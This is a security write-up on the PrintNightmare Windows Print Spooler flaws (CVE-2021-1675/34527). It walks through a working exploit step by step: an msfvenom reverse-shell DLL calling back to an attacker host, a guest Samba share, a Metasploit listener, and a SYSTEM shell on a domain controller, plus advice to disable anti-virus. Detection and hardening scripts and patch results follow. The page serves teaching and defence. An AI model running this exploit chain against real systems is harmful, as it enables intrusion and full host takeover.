CVE-2021-1675-and-CVE-2021-34527-PrintNightmare

From aldeid

Vulnerability

This post details two vulnerabilities (a local privilege escalation and a remote code execution) in the Windows Print Spooler (spoolsv.exe). Both are reached through the RpcAddPrinterDriverEx call of the MS-RPRN interface, which lets a caller make the spooler load a driver DLL of the caller's choosing.

  • CVE-2021-1675
  • CVE-2021-34527

Long story short, Microsoft released a fix in the June 2021 monthly updates to address CVE-2021-1675, which it classified at the time as a local privilege escalation (LPE).

At the end of June 2021, a group of Chinese researchers published an analysis and proof of concept they called "PrintNightmare", demonstrating that the flaw could be exploited remotely (RCE) over MS-RPRN. They did not know that their PoC was actually targeting a different, still unpatched vulnerability, CVE-2021-34527, which is why it kept working against hosts that had installed the June update.

Microsoft then reclassified the initial flaw as Remote Code Execution (RCE) and later shipped a separate out-of-band fix for CVE-2021-34527.

Proof of Concept

Download

Prerequisites

The exploit relies on a modified version of impacket (cube0x0's fork, which carries the MS-RPRN calls the script needs) that you must install before running the exploit. Install it in a Python virtual environment so that it does not replace the impacket used by your other tools. Check first whether your installed impacket already exposes rprn.hRpcAddPrinterDriverEx; if it does, the fork is not needed.

$ pip3 uninstall impacket
$ git clone https://github.com/cube0x0/impacket
$ cd impacket
$ python3 ./setup.py install

Exploit

$ git clone https://github.com/cube0x0/CVE-2021-1675.git
$ cd CVE-2021-1675/
$ python3 CVE-2021-1675.py -h

Confirm that the DC is vulnerable

If the command below (impacket's rpcdump.py) lists MS-RPRN, the spooler's RPC interface is reachable over the network, which is the precondition for the attack. This only proves exposure, not that the host is unpatched: a fully patched DC shows the same endpoint. The only reliable confirmation is to run the exploit against a test host you own, or to check the installed updates on the target.

$ rpcdump.py @172.16.169.135 | grep MS-RPRN
Protocol: [MS-RPRN]: Print System Remote Protocol

Generate the DLL

The exploit makes the spooler (spoolsv.exe, which runs as SYSTEM) load a DLL of our choosing from a UNC path, so the payload must match the target's architecture (x64 here). For the PoC, we generate a reverse shell DLL that connects back to our Kali box.

$ cd /tmp/
$ msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=172.16.169.130 LPORT=443 -o addCube.dll

Host a Samba share

The target fetches the DLL itself, using its computer account (the network identity of SYSTEM), so the share must allow guest access. Below is a minimal Samba configuration file (/etc/samba/smb.conf) that does this:

[global]
    map to guest = Bad User
    server role = standalone server
    usershare allow guests = yes
    idmap config * : backend = tdb
    smb ports = 445

[smb]
    comment = Samba
    path = /tmp/
    guest ok = yes
    read only = no
    browsable = yes

Start Samba:

$ sudo systemctl start smbd.service

Start a listener

┌──(kali㉿kali)-[/data/tmp]
└─$ msfconsole -q
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/shell_reverse_tcp
PAYLOAD => windows/x64/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 172.16.169.130
LHOST => 172.16.169.130
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.169.130:443 

Run the exploit

Note
You may need to disable the anti-virus on the DC to run the exploit: the unobfuscated msfvenom DLL is flagged as soon as the spooler fetches it, which raises an alert and makes the exploit fail.
┌──(kali㉿kali)-[/data/tmp/CVE-2021-1675]
└─$ python3 CVE-2021-1675.py 'my.domain/my.user:my.password@172.16.169.135' '\\172.16.169.130\smb\addCube.dll' 
[*] Connecting to ncacn_np:172.16.169.135[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_2097e02ea77b432e\Amd64\UNIDRV.DLL
[*] Executing \\172.16.169.130\smb\addCube.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...
Traceback (most recent call last):
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 568, in writeFile
    return self._SMBConnection.writeFile(treeId, fileId, data, offset)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1650, in writeFile
    written = self.write(treeId, fileId, writeData, writeOffset, len(writeData))
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1358, in write
    if ans.isValidAnswer(STATUS_SUCCESS):
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3structs.py", line 454, in isValidAnswer
    raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/data/tmp/CVE-2021-1675/CVE-2021-1675.py", line 180, in <module>
    main(dce, pDriverPath,options.share)
  File "/data/tmp/CVE-2021-1675/CVE-2021-1675.py", line 84, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 856, in request
    self.call(request.opnum, request, uuid)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 845, in call
    return self.send(DCERPC_RawCall(function, body.getData(), uuid))
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1298, in send
    self._transport_send(data)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1235, in _transport_send
    self._transport.send(rpc_packet.get_packet(), forceWriteAndx = forceWriteAndx, forceRecv = forceRecv)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/transport.py", line 535, in send
    self.__smb_connection.writeFile(self.__tid, self.__handle, data)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 570, in writeFile
    raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.)

The "Stage0: 0" lines are the return code of RpcAddPrinterDriverEx (0 means the call succeeded and the spooler loaded the DLL); the STATUS_PIPE_CLOSING traceback on the third try is a side effect of the script retrying against a spooler that has already run the payload, not a sign of failure. You should now have a reverse shell in the listener window, running as SYSTEM because the DLL executes inside spoolsv.exe:

[*] Started reverse TCP handler on 172.16.169.130:443 
[*] Command shell session 1 opened (172.16.169.130:443 -> 172.16.169.135:50246) at 2021-07-07 13:28:35 +0200

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>
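
What the run above leaves behind on the target is the attacker's DLL under the spooler's driver directory (C:\Windows\System32\spool\drivers\x64\3, typically in an old\<n> subfolder once the spooler has moved it) and PrintService events 316 (driver added or updated, Operational log) and 808 (plug-in module failed to load, Admin log). The following triage script is an added example written for this page, not code from the original page or from the cube0x0 PoC; the function names are ours, the paths and event IDs are Microsoft's, and it assumes you run it as an administrator on the DC. The Operational log is disabled by default, so 316 only appears if it was enabled beforehand (wevtutil sl Microsoft-Windows-PrintService/Operational /e:true).

```powershell
# Added example (not part of the original page): post-exploitation triage of the
# print spooler driver store and PrintService logs. Run as an administrator.

# Driver directory used by the spooler on x64 Windows; the exploit's DLL lands here.
$DriverStore = 'C:\Windows\System32\spool\drivers\x64\3'

function Get-SuspiciousSpoolerDll {
    param([int]$Days = 7)
    $since = (Get-Date).AddDays(-$Days)
    Get-ChildItem -Path $DriverStore -Recurse -Filter '*.dll' -ErrorAction SilentlyContinue |
        Where-Object { $_.LastWriteTime -ge $since } |
        ForEach-Object {
            $sig = Get-AuthenticodeSignature -FilePath $_.FullName
            [pscustomobject]@{
                Path      = $_.FullName
                Written   = $_.LastWriteTime
                InOldDir  = $_.FullName -match '\\old\\\d+\\'   # where the spooler parks replaced drivers
                Signature = $sig.Status                          # msfvenom output is NotSigned
            }
        } |
        Where-Object { $_.InOldDir -or $_.Signature -ne 'Valid' }
}

function Get-SuspiciousDriverEvent {
    param([int]$Days = 7)
    $since = (Get-Date).AddDays(-$Days)
    $filters = @(
        @{ LogName = 'Microsoft-Windows-PrintService/Operational'; Id = 316; StartTime = $since },
        @{ LogName = 'Microsoft-Windows-PrintService/Admin';       Id = 808; StartTime = $since }
    )
    foreach ($f in $filters) {
        Get-WinEvent -FilterHashtable $f -ErrorAction SilentlyContinue |
            # flag UNC paths (the DLL was pulled from a remote share), old\<n> paths and the x64\3 store
            Where-Object { $_.Message -match '\\\\[^\\]+\\|\\old\\\d+\\|\\x64\\3\\' } |
            Select-Object TimeCreated, Id, Message
    }
}

Get-SuspiciousSpoolerDll   | Format-Table -AutoSize
Get-SuspiciousDriverEvent  | Format-List
```

A DLL named like the one you pushed (addCube.dll in this write-up), unsigned, under old\1\, together with a 316 event whose file list points at it, is the footprint of a successful run.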

Mitigation

Disable the Spooler service

Run the following from an elevated PowerShell prompt (REG ADD is a cmd.exe tool but runs unchanged from PowerShell; Start=4 is the "Disabled" start type, so the service does not come back after a reboot):

Stop-Service Spooler
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /f

Uninstall Print-Services

On Windows Server you can also remove the print server role entirely (PowerShell):

Uninstall-WindowsFeature Print-Services
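
Disabling the spooler is the right answer on domain controllers and on any host that never prints. Where the spooler must stay, the July 2021 fix for CVE-2021-34527 only holds if the Point and Print policy values NoWarningNoElevationOnInstall and UpdatePromptSettings are 0 or absent, and Microsoft's guidance (KB5005010) adds RestrictDriverInstallationToAdministrators=1; the RegisterSpoolerRemoteRpcEndPoint=2 value is the registry form of the "Allow Print Spooler to accept client connections" policy set to Disabled, which stops inbound remote printing. The script below is an added example for this page, not code from the original page; the function names are ours and the registry value names are Microsoft's. It reports the current state and, on request, applies the hardening. Run it as an administrator.

```powershell
# Added example (not part of the original page): report and apply spooler hardening.
# Registry value names are those documented by Microsoft (KB5005010); function names are ours.

$PnP      = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
$Printers = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers'

function Get-RegValue([string]$Path, [string]$Name) {
    # returns $null when the key or value does not exist (the default on an unmanaged host)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

function Test-SpoolerHardening {
    $svc = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    [pscustomobject]@{
        SpoolerStatus        = if ($svc) { $svc.Status }    else { 'NotInstalled' }
        SpoolerStartType     = if ($svc) { $svc.StartType } else { 'NotInstalled' }
        # 1 = only administrators may install printer drivers
        RestrictToAdmins     = Get-RegValue $PnP 'RestrictDriverInstallationToAdministrators'
        # both must be 0 or absent; 1 re-opens the hole even on a patched host
        NoWarnNoElevation    = Get-RegValue $PnP 'NoWarningNoElevationOnInstall'
        UpdatePromptSettings = Get-RegValue $PnP 'UpdatePromptSettings'
        # 2 = spooler does not register its remote RPC endpoint (no inbound remote printing)
        RemoteRpcEndpoint    = Get-RegValue $Printers 'RegisterSpoolerRemoteRpcEndPoint'
    }
}

function Invoke-SpoolerHardening {
    param([switch]$DisableSpooler)   # use on DCs and on hosts that never print
    foreach ($p in @($PnP, $Printers)) {
        if (-not (Test-Path $p)) { New-Item -Path $p -Force | Out-Null }
    }
    Set-ItemProperty -Path $PnP      -Name 'RestrictDriverInstallationToAdministrators' -Value 1 -Type DWord
    Set-ItemProperty -Path $PnP      -Name 'NoWarningNoElevationOnInstall'               -Value 0 -Type DWord
    Set-ItemProperty -Path $PnP      -Name 'UpdatePromptSettings'                        -Value 0 -Type DWord
    Set-ItemProperty -Path $Printers -Name 'RegisterSpoolerRemoteRpcEndPoint'            -Value 2 -Type DWord
    if ($DisableSpooler) {
        Stop-Service -Name Spooler -Force -ErrorAction SilentlyContinue
        Set-Service  -Name Spooler -StartupType Disabled   # same effect as Start=4 above
    }
    Test-SpoolerHardening
}

Test-SpoolerHardening
# Invoke-SpoolerHardening -DisableSpooler
```

A host is in the expected state when SpoolerStartType is Disabled (for a DC) or, where printing is needed, RestrictToAdmins is 1, NoWarnNoElevation and UpdatePromptSettings are 0 or empty, and RemoteRpcEndpoint is 2; the spooler must be restarted for the RPC endpoint change to take effect.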

Patch

With the Windows updates applied (the out-of-band July 2021 fix for CVE-2021-34527), the same RpcAddPrinterDriverEx call is now refused with rpc_s_access_denied and the RCE no longer works:

┌──(kali㉿kali)-[/data/tmp/CVE-2021-1675]
└─$ python3 CVE-2021-1675.py 'my.domain/my.user:my.password@172.16.169.135' '\\172.16.169.130\smb\addCube.dll'
[*] Connecting to ncacn_np:172.16.169.135[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_2097e02ea77b432e\Amd64\UNIDRV.DLL
[*] Executing \\172.16.169.130\smb\addCube.dll
[*] Try 1...
Traceback (most recent call last):
  File "/data/tmp/CVE-2021-1675/CVE-2021-1675.py", line 176, in <module>
    main(dce, pDriverPath, options.share)
  File "/data/tmp/CVE-2021-1675/CVE-2021-1675.py", line 84, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rpcrt.DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied